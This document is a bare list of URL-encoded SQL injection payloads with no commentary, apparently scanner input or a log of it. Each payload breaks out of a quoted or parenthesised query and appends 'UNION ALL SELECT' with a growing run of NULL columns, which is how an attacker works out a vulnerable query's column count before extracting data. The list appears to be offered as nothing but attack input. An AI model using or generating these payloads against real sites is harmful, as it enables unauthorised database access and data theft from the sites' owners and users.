1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 